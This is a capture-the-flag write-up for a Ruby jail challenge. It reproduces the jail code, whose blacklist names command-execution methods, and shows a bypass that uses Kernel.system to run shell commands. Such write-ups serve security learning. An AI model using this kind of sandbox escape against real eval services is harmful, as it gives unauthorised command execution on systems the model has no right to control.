Simple ruby jail challenge with a failing blacklist that deletes common methods that allow for arbitrary command execution.

Challenge Description

Points

200

Description

There are many python jail challenges in CTFs.

Let's try to break something new!

The flag is located at ./flag.

nc 54.255.188.183 7411

Solvers

4 Teams solved

Solution

We are given a ruby jail:

#!/usr/bin/env ruby

$stdout.sync = true

def ban(m, blacklist)
  m.module_eval do
    blacklist.each do |meth|
      send(:remove_const, meth) rescue nil
      define_method(meth) do |*|
        raise "No Hack No Life :P (#{meth})"
      end
    end
  end
end

ban(Kernel, %i(` exec fork load open spawn syscall system))
ban(Object, %i(Dir File IO ObjectSpace Process Thread class))

loop do
  print '> '
  line = $stdin.gets
  break if line.nil?
  begin
    p eval(line, TOPLEVEL_BINDING)
  rescue Exception => e
    puts e
  end
end

Even though it says that Kernel.system is supposed to be blacklisted, it does not seem to work.

$ ruby a9463878cec7f509bb79017455f31293_jail.rb
> Kernel.system("whoami")
ubuntu
true
> Kernel.system("ls")
a9463878cec7f509bb79017455f31293_jail.rb  jail.rb
true
>

Thus, we can get the flag with the new shell access we have.

Leave a Comment